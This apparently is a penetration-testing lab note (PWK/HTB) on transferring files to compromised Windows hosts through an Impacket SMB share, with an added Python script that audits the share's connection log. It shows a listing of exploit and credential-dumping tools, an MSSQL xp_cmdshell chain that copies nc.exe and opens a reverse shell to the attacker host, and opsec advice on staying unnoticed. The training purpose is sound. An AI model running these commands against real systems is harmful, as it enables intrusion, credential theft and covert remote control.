PWK Notes: Post-Exploitation Windows File Transfers with SMB
Moving files to and from a compromised Linux machine is, in general, pretty easy. You’ve got nc, wget, curl, and if you get really desperate, base64 copy and paste. Windows is another issue altogether. PowerShell makes this somewhat easier, but for a lot of the PWK labs, the systems are too old to have PowerShell. The course material goes over a few ways to achieve this, but they don’t cover my favorite - SMB. This may be less realistic in an environment where you have to connect from a victim machine back to your attacker box over the public internet (where SMB could be blocked), but for environments like PWK labs and HTB where you are VPNed into the same LAN as your targets, it works great.
Overview
The goal here is to get easy file transfer to and from a compromised Windows host. To do this, we’ll create an SMB share on our local box, and then connect to that share from the compromised Windows host. From there, we can copy files into the shared folder on either host, and then access them on the other host.
Server
Installation
The Impacket tool set comes pre-installed on Kali. If you don’t have it for some reason, you can install it with apt install python-impacket. You can also clone the Secure Auth Corp Impacket git repo if you want the most up to date version.
Starting the Server
To get the server up and running on our local box, simply enter the following syntax:
# impacket-smbserver.py shareName sharePath
shareName - can be anything you want, but you’ll need to know this in order to connect back to the share
sharePath - the folder you want shared
Example
For example, I keep a tools directory with a bunch of common stuff I might need as I work through my labs:
root@kali# ls tools/
25912.exe cachedump.exe lonelypotato.exe ms11-046.exe MS14-002.exe MS14-070.exe nc.exe PwDump.exe wce32.exe windows-privesc-check2.exe
37049-32.exe ff.exe mimikatz MS11-046.exe MS14-070 MS14-070.rar plink.exe rottenpotato.exe wce64.exe winx86_meterpreter_80.exe
accesschk-2003-xp.exe fgdump.exe mimikatz.exe MS13-053.exe MS14-070_adduser nc64.exe Privesc sysinternals whoami.exe winx86_stageless_shell_80.exe
Others like to create an smb directory for each target and drop the necessary files into it.
Then I can share this directory as follows:
root@kali# impacket-smbserver smb tools/
Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
Client
Syntax
From the Windows host, we need to use the built-in net use command to connect to our shared drive. Here are three examples of the syntax:
C:\>net use
C:\>net use \\[host]\[share name]
C:\>net use /d \\[host]\[share name]
The first command will list all currently connected shares. The second will create a connection to the named share at the given host (in our case, typically an IP address). The third command will close that connection.
Once that runs, you can reference the share by its full UNC path.
Examples
With Shell
Let’s say we wanted to copy a privesc binary to the host. We could do the following.
Connect to the share:
C:\>net use \\10.11.0.XXX\smb
net use \\10.11.0.XXX\smb
The command completed successfully.
Copy the file:
C:\WINDOWS\Temp>copy \\10.11.0.XXX\smb\ms11-046.exe \windows\temp\a.exe
copy \\10.11.0.XXX\smb\ms11-046.exe \windows\temp\a.exe
1 file(s) copied.
To Get Shell From RCE
In a different case, I only had access to an MSSQL database, and wanted to get a full shell. I used xp_cmdshell to map my drive, copy nc to the host, and run it:
1> xp_cmdshell 'net use \\10.11.0.XXX\smb'
2> go
output
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
The command completed successfully.
NULL
NULL
(return status = 0)
1> xp_cmdshell 'copy \\10.11.0.XXX\smb\nc.exe \windows\temp\nc.exe'
2> go
output
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 file(s) copied.
NULL
(return status = 0)
1> xp_cmdshell '\windows\temp\nc.exe -e cmd.exe 10.11.0.XXX 443'
2> go
Opsec Notes
Locally
When you run this server, you’ve created an unauthenticated share on the network that anyone can read and write to. That’s why it’s important not to share anything sensitive (like your notes directory), as someone could mess with or delete them.
It’s also a good idea to take down the share when you’re not using it.
You will be able to tell when a new host connects to your share, and when they disconnect:
[*] Incoming connection (10.11.1.X,3187)
[*] AUTHENTICATE_MESSAGE (\,USERNAME)
[*] User \USERNAME authenticated successfully
[*] :::00::4141414141414141
[*] Closing down connection (10.11.1.5,3187)
[*] Remaining connections []
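Because the share impacket-smbserver creates accepts any connection, it is worth knowing exactly which hosts touched it while it was up. The following script is an added example, not code from the original post or from Impacket: it replays the server's console output (the line formats are modelled on the log shown above), pairs each incoming connection with its closing line, records which username each peer presented, and flags any peer that is not in an allowlist of the hosts you were actually working on. The sample log lines, the 10.11.1.99 peer and the allowlist are constructed for the example.

```python
"""Audit impacket-smbserver console output: who connected to the open share?

Added example, not part of the original post. Line formats follow the
server output shown in the post; the sample log and allowlist are
constructed here so the script runs offline.
"""
import re
from dataclasses import dataclass, field

# Patterns modelled on the impacket-smbserver lines shown in the post.
OPEN_RE = re.compile(r"\[\*\] Incoming connection \(([\d.]+),(\d+)\)")
CLOSE_RE = re.compile(r"\[\*\] Closing down connection \(([\d.]+),(\d+)\)")
USER_RE = re.compile(r"\[\*\] User (\S+) authenticated successfully")

# Constructed sample log: the first peer is a lab box you expected, the
# second (10.11.1.99) is a host you were not working on.
SAMPLE_LOG = [
    "[*] Incoming connection (10.11.1.5,3187)",
    "[*] AUTHENTICATE_MESSAGE (\\,USERNAME)",
    "[*] User \\USERNAME authenticated successfully",
    "[*] :::00::4141414141414141",
    "[*] Incoming connection (10.11.1.99,49201)",
    "[*] User \\someone authenticated successfully",
    "[*] Closing down connection (10.11.1.5,3187)",
]


@dataclass
class ShareAudit:
    """Result of replaying a server log."""
    opened: list = field(default_factory=list)      # (ip, port) that connected
    closed: list = field(default_factory=list)      # (ip, port) that disconnected
    users: dict = field(default_factory=dict)       # (ip, port) -> name presented
    unexpected: list = field(default_factory=list)  # peers outside the allowlist

    @property
    def still_open(self):
        """Connections opened but never closed within the log."""
        return [peer for peer in self.opened if peer not in self.closed]


def audit_smbserver_log(lines, allowed_hosts):
    """Replay log lines in order and return a ShareAudit.

    allowed_hosts is the set of peer IPs you expect (the boxes you are
    working on). The server accepts any credentials, so the username is
    recorded only as information, never as proof of who connected.
    """
    audit = ShareAudit()
    last_peer = None  # the auth line follows its connection line
    for line in lines:
        m = OPEN_RE.search(line)
        if m:
            peer = (m.group(1), int(m.group(2)))
            audit.opened.append(peer)
            last_peer = peer
            if peer[0] not in allowed_hosts:
                audit.unexpected.append(peer)
            continue
        m = USER_RE.search(line)
        if m and last_peer is not None:
            audit.users[last_peer] = m.group(1)
            continue
        m = CLOSE_RE.search(line)
        if m:
            audit.closed.append((m.group(1), int(m.group(2))))
    return audit


def main():
    audit = audit_smbserver_log(SAMPLE_LOG, allowed_hosts={"10.11.1.5"})
    for peer in audit.opened:
        print(f"{peer[0]}:{peer[1]} presented {audit.users.get(peer, '?')}")
    print("still open:", audit.still_open)
    print("unexpected peers:", audit.unexpected)


if __name__ == "__main__":
    main()
```

In practice you would feed it the saved console output of a session (for example, run the server under tee) and review the unexpected list before reusing anything that was written into the shared folder.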
On Target
There is an option to net use to allow you to reference a connected share by a new drive letter. To do this, just run:
C:\>net use p: \\10.11.0.X\smb
From there, you can go to that drive and it is easier to interact with. It’s also very unsafe opsec. A user on the box is unlikely to see a mapped share, but might very well notice a new drive letter. The same goes for others in the labs with you attacking the same box. It’s worth the extra trouble to just use the UNC path.